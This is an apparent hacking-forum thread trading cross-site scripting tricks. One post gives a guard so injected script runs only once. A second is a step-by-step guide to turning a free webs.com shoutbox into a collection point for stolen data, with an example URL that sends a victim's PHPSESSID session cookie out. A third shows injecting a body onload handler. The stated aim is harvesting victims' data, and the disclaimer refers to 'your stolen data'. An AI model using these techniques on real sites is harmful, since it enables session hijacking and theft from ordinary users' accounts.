well, i recall writing a few things on xss in topics of various locations over the past couple of years. so, i thought it might be a good idea to start a thread that allows everyone to share tips and tricks of their own.

basically no rules, but i would recommend that you don't give links to vulnerable pages as a POC.

Preventing multiple executions of the injected code

so let me start with one of my old favourites. when a page has an injection vulnerability that gets echoed in more than one places on the same page, you'd often times like to force the injected script to run only once - mainly to stop your site from catching the same data several times. i have found that this can be achived by using the typeof operator as follows:

if(typeof x=="undefined"){x=1;[code to be executed]]);}

though sometimes the quotes are filtered, which makes it a bit more tricky. not to fear, it can be circumvented like so:

if(typeof x==typeof y){x=1;[code to be executed]]);}

hope this helps.

Not got your own server? not a problem - using webs [dot] com shout boxes to harvest data

what you will need:

1. an email account
2. a webs.com account (they're free)

step1:
create a shoutbox. navigate to: site addons > shoutboxes > Click here to create a new ShoutBox.

step2:
set up the shout box. once set up, have a look at the code for the box. the interesting bits are highlighted in red. jot them down, we'll be needing them later

<script type="text/javascript" src="http://link.members.webs.com/JS/checkLogin.jsp"></script>
<script type="text/javascript" src="hxxp://images.webs.com/JS/fw.js"></script>
<script type="text/javascript" src="hxxp://images.webs.com/JS/fw.shoutbox.js"></script>
<script type="text/javascript" src="hxxp://link.members.webs.com/Members/Comments/loadShoutBoxJS.jsp?shoutBoxOwnerID=[ownerId#]&listID=[listId#]&skinName=light&width=300&height=400"></script>

step3:
now the fun bit. taking the data we collected, edit the following url, filling in the blanks:
hxxp://link.members.webs.com/Members/Comments/postComment.jsp?userID=[ownerId#]&commentSettingID=[listId#]&name=AceldamA&next=callback&callback=

step4:
we're almost ready now. all we need to add is two variables:

1. rand - a random number to ensure the script refreshes
2. body - the data we want to log

just append these two to the url get request and we're set. following is an example of a completed url:
hxxp://link.members.webs.com/Members/Comments/postComment.jsp?userID=XXXXX&commentSettingID=XXXXX&name=haxxor&next=callback&callback=&rand=0.8838134699569573&body=PHPSESSID%3D9915ec261f208a63d2ee34d16c914703

step5:
now we just need to check the data. you can do this by visiting the shoutbox. just naviagte to the shoutbox you created and there it is!

DISCLAIMER:
i take no responsibility for what you do with your stolen data. this is for educational purposes only. happy hacking - AceldamA

Just an realy easy thing:

If you want to trigger your JavaScript with the onload handler. But onload does only work with the <frameset> and the <body> tag. You will raley be able to inkect code into the original body tag. But you can inject your own. This could look similar to this:

<body onload="alert('vulnerable');"></body>

Of course, this does only work, if not too much is filtered out.